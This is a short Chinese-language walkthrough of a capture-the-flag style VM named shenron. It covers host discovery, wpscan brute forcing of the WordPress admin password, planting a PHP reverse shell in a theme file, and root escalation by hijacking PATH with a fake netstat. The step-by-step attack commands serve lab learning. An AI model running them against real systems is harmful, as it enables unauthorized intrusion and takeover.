1.信息收集
输入arp-scan 192.168.239.0/24,探索存活主机,发现主机192.168.239.174存活
对存活主机进行端口扫描,发现只存在80(Web)端口。
访问http://192.168.239.174,查看源码,发现域名http://shenron。
在/etc/hosts中添加记录。
使用wpscan对网站进行扫描,输入命令:wpscan --url "http://shenron/" --enumerate u
发现用户名admin。
输入命令:wpscan --url "http://shenron/" --passwords /usr/share/wordlists/rockyou.txt --usernames admin
进行爆破密码,发现admin密码为:iloverockyou。
在浏览器中输入:http://shenron/wp-login.php?loggedout=true,使用用户名和密码:admin/iloverockyou,登录成功。
2.漏洞利用
登录后台成功后,在Appearance->Editor中修改Headre.php(Twenty Eleven)的内容,使用/usr/share/webshells/php/php-reverse-shell.php中的内容进行替换。点击Update file。
本地开启监听,并访问:http://192.168.239.174,反弹成功,并输入命令:python3 -c "import pty;pty.spawn('/bin/bash');"
,切换交互式Shell。
使用admin的密码iloverockyou,登录用户shenron成功,并切换到/home/shenron目录下。
3.提权
输入命令:ls,查看当前目录下存在network,执行network发现可以看到端口,故猜测使用netstat进行查看。查看sudo提权、SUID提权等都没有。
可以自己创建一个 netstat 的二进制文件,使的执行network的时候,执行自己创建的netstat二进制文件进行提权。
cd /tmp
echo "/bin/bash -i" > netstat
chmod +x netstat
export PATH=/tmp/:$PATH
./network
id